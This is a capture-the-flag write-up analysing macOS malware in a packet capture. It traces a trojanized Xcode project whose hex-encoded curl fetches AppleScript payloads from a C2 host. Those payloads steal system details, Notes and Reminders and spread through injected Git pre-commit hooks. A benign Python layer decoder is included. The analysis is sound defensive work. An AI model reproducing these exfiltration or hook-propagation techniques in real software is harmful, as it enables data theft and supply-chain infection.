Arctic Howl - Week 1 First Tracks


OffSec Arctic Howl Tundra Realm Season 2


Challenge Overview

| Field | Details |
|---|---|
| Status | COMPLETED |
| Category | Malware Analysis, PCAP Forensics, Incident Response |
| Difficulty | Easy |
| Event | Arctic Howl: The Cascade Expanse Season 2 |
| Score | 40 / 40 |

Scenario

At the Cascade Law Archive, the IT department detected a sudden cold spike in outbound network traffic shortly after onboarding a new developer. While the firm primarily operates on Windows systems, the new hire requested a Mac laptop. The developer reports no intentional software downloads, but confirms cloning a starter Xcode project from an internal Git repository as part of onboarding.

File Provided: capture.pcap (ZIP password: 3531e680028eb73989f3a3b2ce129241)


Questions

| # | Question |
|---|---|
| 1 | What URL did the malware download the first stage from? What user-agent sent the request? |
| 2 | How does the C2 server obfuscate its payloads? |
| 3 | Analyze the looz payload. What information does it extract from the victim machine? |
| 4 | Analyze the cozfi_xhh payload. What information does it extract from the victim machine? |
| 5 | How does the malware attempt to infect other devices? Which payload is responsible? |
| 6 | What file contained the initial malware? How is the initial payload obfuscated? |

Key Skills

  • PCAP analysis (Wireshark / tshark)
  • Multi-layer encoding reversal (triple hex, 7 nested Base64 layers)
  • AppleScript malware analysis
  • Mac forensics and macOS artifact locations
  • Git hook injection detection
  • C2 infrastructure mapping
  • Supply chain attack investigation
  • IOC extraction and detection rule authoring (YARA, Sigma, Snort)

Key Findings

| Question | Answer |
|---|---|
| Q1 Initial Download | http://bu1knames.io/a via curl/8.7.1 |
| Q2 Obfuscation | 7 nested Base64 layers in the AppleScript payloads |
| Q3 looz Payload | Exfiltrates browser, macOS version, Safari version, locale, firewall status, SIP status and CPU info; POST to /i |
| Q4 cozfi_xhh | Exfiltrates Apple Notes + Reminders and the serial number; ZIP upload to /n?s=<serial> |
| Q5 Propagation | jez payload injects malicious pre-commit hooks into all local Git repos |
| Q6 Initial File | xcassets.sh hidden in .xcodeproj/xcuserdata/.xcassets/, triple hex encoded |
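The Q2 and Q6 answers describe two stacked encodings (seven Base64 layers, three hex layers). The decoder below is an added example written for this page, not the writeup's own tooling: it peels hex or Base64 layers one at a time, accepting a layer only while the output is still printable text, and reports the layer sequence. The two blobs it decodes are constructed stand-ins (a harmless AppleScript line and a harmless shell line), not the payloads from capture.pcap.

```python
import base64
import binascii
import string

PRINTABLE = set(string.printable.encode())


def _try_hex(data: bytes):
    s = data.strip()
    if not s or len(s) % 2 or any(c not in b"0123456789abcdefABCDEF" for c in s):
        return None
    return binascii.unhexlify(s)


def _try_base64(data: bytes):
    s = b"".join(data.split())          # tolerate line-wrapped blobs
    if not s or len(s) % 4:
        return None
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def peel_layers(blob: bytes, max_layers: int = 16):
    """Strip nested hex / Base64 layers until no decoder applies.
    Returns (plaintext, [layer names, outermost first])."""
    layers, current = [], blob
    for _ in range(max_layers):
        for name, decoder in (("hex", _try_hex), ("base64", _try_base64)):
            decoded = decoder(current)
            # accept the layer only if its output is still printable text
            if decoded and all(b in PRINTABLE for b in decoded):
                layers.append(name)
                current = decoded
                break
        else:
            break                       # neither decoder applied: plaintext reached
    return current.decode("ascii", errors="replace"), layers


def encode_layers(data: bytes, name: str, n: int) -> bytes:
    """Build a constructed sample in the writeup's style (hex x n or Base64 x n)."""
    for _ in range(n):
        data = binascii.hexlify(data) if name == "hex" else base64.b64encode(data)
    return data


# Constructed stand-ins for the two schemes named in Q2 and Q6 (not the real payloads).
APPLESCRIPT_BLOB = encode_layers(b'do shell script "echo sample"', "base64", 7)
XCASSETS_BLOB = encode_layers(b"echo stage0-placeholder", "hex", 3)

if __name__ == "__main__":
    for blob in (APPLESCRIPT_BLOB, XCASSETS_BLOB):
        text, layers = peel_layers(blob)
        print(f"{len(layers)} layer(s) {'>'.join(layers)}: {text}")
```

Hex is tried before Base64 because every hex string is also a syntactically valid Base64 string, while the reverse is not true.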

Attack Chain

1. Developer clones the trojanized Xcode project
2. xcassets.sh executes (triple hex encoded curl to bu1knames.io/a)
3. C2 delivers the 7-layer Base64 encoded AppleScript payloads
4. looz: system profiling, POST /i
5. seizecj: secondary profiling
6. cozfi_xhh: Apple Notes + Reminders theft, POST /n
7. txzx_vostfdi: persistence
8. jez: Git pre-commit hook injection (propagation)
9. Infection spreads to all local repos shared with other developers

C2 Infrastructure

Domain: bu1knames.io
Protocol: HTTP
Port: 80

| Endpoint | Purpose |
|---|---|
| /a | Initial beacon + payload download |
| /l | Environment data |
| /s/<name> | Payload distribution |
| /i | System info exfiltration |
| /n | Notes/Reminders upload |

Files

| File | Description |
|---|---|
| INVESTIGATION_REPORT.md | Full forensic analysis + all 6 question solutions |

Tools Used

Wireshark, tshark, xxd, base64, Python 3, Kali Linux VM, grep/sed/awk


Writeup completed: March 4, 2026. OffSec Arctic Howl Season 2. Score: 6/6 correct.


Source: https://ctf-writeups-webb.vercel.app/posts/events-season2-week1-first-tracks/
Author: Umair Aziz
Published: 2026-04-02
License: CC BY-NC-SA 4.0